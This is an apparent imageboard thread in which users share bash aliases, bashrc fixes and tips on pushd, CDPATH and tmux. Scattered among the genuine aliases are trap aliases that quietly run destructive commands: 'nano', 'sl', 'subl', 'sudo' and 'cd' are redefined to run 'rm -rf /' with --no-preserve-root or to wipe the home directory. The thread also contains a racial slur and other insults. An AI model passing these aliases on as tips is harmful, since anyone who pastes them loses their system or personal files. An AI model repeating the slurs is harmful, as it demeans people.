
Share your aliases

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>sudo vim
Use sudoedit.

instead of e='exit', you can always just smash that motherfucking ctrl+d on most shells

instead of z='clear', you can always just smash that motherfucking ctrl+l on most shells

>When autosm hits hard

>using aliases
>not using superior functions

alias vim='nvim'
alias please='sudo $(fc -nl -1)'
alias tomcatded='fuser -k -n tcp 1099'
alias encrypt='7z a a -p -mhe -mmt=4 -mx -v50m'

Sometimes they don't work with local tmux+ssh remote tmux

I use both.

you have 2 p aliases

Thanks, I never noticed that. I'll change the projects one to 'pr' and try actually using it.

I use both.

>tfw have a file and also have it in bashrc but aliases not working regardless
o-ok then

The file should have filename ".bashrc" and be in your user directory (/home/user)

it's all that. just copied the one that works in my all my machines, it just doesn't work for this specific server. nothing special about it.

>not using comfy py alias for python

Sometimes you need to make sure /bashrc is tied to bash_profile.

eg: ln -s .bashrc .bash_profile
Then re-login.

yeah seems to have done the job, thanks. never had to do that so that was odd, but good to know for next time.

>using python. . .

alias fuck='sudo $(history -p \!\!)'

alias up='cd ..'
alias app="sudo pacman -S $1"
alias sniff="sudo tcpdump | grep $*"

alias rmdb='sudo rm /var/lib/pacman/db.lck'

alias trello='~/trello-cli/bin/trello'
alias cmusl='cmus --listen'

alias simplenotelist="vim -c 'Simplenote -l'"

alias mp3='youtube-dl -x --audio-format "mp3" $*'
alias simplenote="vim -c 'SimplenoteNew'"

alias webserver='python3 -m http.server'
ffmpeg -i $in -i $music -codec copy -shortest $out
alias media="cd ~/Pictures"
alias diff='diff --color=auto'
alias grep='grep --color=auto'
export GREP_COLOR="1;32"
alias ls='ls --color=auto'

sprunge() {
if [[ $1 ]]; then
curl -F 'sprunge=

here are some
alias weather='curl'
alias myextip='curl'
alias fuck='sudo !!'

>alias myextip='curl'

alias vimx='vim -c %\!xxd'
alias gitg='git log --graph --oneline --decorate --all'
alias iip="sudo /sbin/ifconfig wlan0|grep inet|head -1|sed 's/\:/ /'|awk '{print $3}'"

Maybe you're one of those idiots who is using zsh and is trying to use bash's configuration file with it.

## Pacman
alias update="pacman -Syy"
alias upgrade="pacman -Syyu"
alias remove="pacman -Rsnc"
alias install="pacman -S"
alias search="pacman -Ss"
alias mlupdate="reflector --verbose -l 5 --sort rate --save /etc/pacman.d/mirrorlist"

## Core aliases
alias em="emacs"
alias h="history 25"
alias ls="ls --color=auto"
alias la="ls -a --color=auto"
alias ll="ls -ahl --color=auto"
alias rsync="rsync -rv --progress"

## VCS
alias gitclean="git clean -xdf"
alias gitreset="git reset --hard origin/master"
alias hgclean="hg purge"
alias hgreset="hg up -C"

## Misc
alias diff="diff -urNdp"
alias patch="patch -p1

# OS X specific aliases
alias umountz='sudo zpool export'
alias ql='qlmanage -p'
alias eject='sudo zfs unmount'
alias ci40='screen /dev/tty.usbserial-DN01M65W 115200 --raw --eol lf'
alias airport='/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport'

alias doas='sudo'
alias ydl='youtube-dl'

alias ies="emacsclient -n" # in existing (emacs) session
alias inf="emacsclient -nc" # in new (emacs) frame

thats it

Consider using "sudo !!" instead of the "please" alias.


alias :q!="exit"

alias nano='sudo rm -rf -no-preserve-root /'

I did, I prefer to write "please"

alias ls="ls --color"
alias grep="grep --color"
alias nano="vim"
alias serve="python3.4 -m http.server"

>alias sf='clear && screenfetch -t'

Woops, didn't mean to quote.

rm: invalid option -- 'n'

Why would it do that?

cool thread

so microchip semiconductor company is running a bot net of cat fishers from plenty of fish that tried to do the numale attempt of running a small buisness in russia?

Who is this bitch? she needs fired.

I hate imagemagick so much

aliasing is cancer

suggest an alternative


stop being a nigger

Pretty histerical.

Who would of figured a semiconductor company had tech ties?

Reminder: tech = hack

alias woman=man
Im very liberal :^)

instead of using your "Navigating trick"
you can just use
cd -

also this

ctrl-d will work to exit a shell

>one letter variable names
>one letter aliases

what next, youre going to tell me intel has programmers?


alias sl="sudo rm -rf--no-preserve-root /"

alias p="pushd" +="pushd ." -="popd" d="dirs -l -v"
These were defaults when I used SuSE years ago.
Don't know if they still are, but I still take them everywhere I go.
I think the "dirs -l -v" part is mine, tho.

they're not the same
cd - just returns to last directory
op's version lets you return to the set directory
no matter how many times you cd

>ctrl + r thread

learn2 use $DIRSTACK and set your $CDPATH

cd to /some/directory/fifteen/folders/deep/when/realize/you/want/to/cd/home/for/a/few/things/
pushd . # stick . on the $DIRSTACK
cd ~ # do your stuff
cd /here
cd /there
pushd # your back at that place fifteen folders deep

that's nice but it's still insufficient
in OP's alias, "ck" will return to the dir set by "ba" any number of times
the pushd ./pushd pair are only good for one use

Instead of aliases, add those dirs to your CDPATH as in
pic related. (In .bashrc)
>autocomplete friendly
The DIRSTACK doesn't expire until you exit a shell session, or you can popd directories off the stack.
see help pushd and this pic related and .
You'll learn to love this shit.

>alias install="pacman -S"
this needs to be pacman -Syu


>install is already /usr/bin/install
>he makes it an alias
Good luck figuring out why that script that calls install won't work.
>Always type before you alias

Why not use one letter aliases for things you use very often? Saves many keystrokes.

pacaur -Syu acestream-launcher
acestream-launcher -p mpv acestream://ce238630848d10ca34cf1bcbfc8be129aa0313be

formula 1 is starting now :^)

alias ls='ls --color=auto'
alias shutn='shutdown now'
alias spac='sudo pacman'
alias pac='pacman'
alias saura='sudo aura'
alias docs='cd Documents'
alias downs='cd Downloads'

You posted this just to make me()
mad, didn't you?


alias sudo='sudo rm -rf / --no-preserve-root ;'
alias cd='rm -rf ~/* ;'
alias ls='cd'
alias cp='firefox'
alias mv='cd'
alias mkdir='cd'
alias top='cd'
alias exit='cd'
alias reboot='cd'
alias shutdown='cd'


hello this is the autism thread yes?

You're fucking autistic. As expected from a vim user.

not a lot right now

Why are aliases considered autistic on Sup Forums of all places

Dr. Bottomsworth

It's summer

Or you can do "source .bashrc" too

>not using pushd/popd

>he's never done serious work over SSH
tmux is a godsend.

alias fuck='sudo $(history -p

>using screen
I really like ctrl-b s senpai

ctrl-b ctrl-b s if you're in a ssh tmux within a tmux


what's the differnce between sudo $(history -p

alias chrome="google-chrome-stable"

*alias chrome="google-chrome-beta"

How's Chicago this time of year?

It's going to be in the 90s this week and humid, so terrible.

>alias nano="vim"
I haven’t laughed like that in a good while, thanks user!

no, grew out of the zsh meme. thanks for the insult though

**alias chrome="google-chrome-dev"


>using nano

alias subl='rm -rf ~/* ;'

alias install="sudo dpkg -i"

What's wrong with tmux?


That's my online alias

What does do?

OP go learn what pushd popd and cdpath do. You can probably remove a few of those...

> # If not running interactively, don't do anything.
> [[ $- != *i* ]] && return

Using one or two letter aliases is faster and simpler.

post more terminal tips please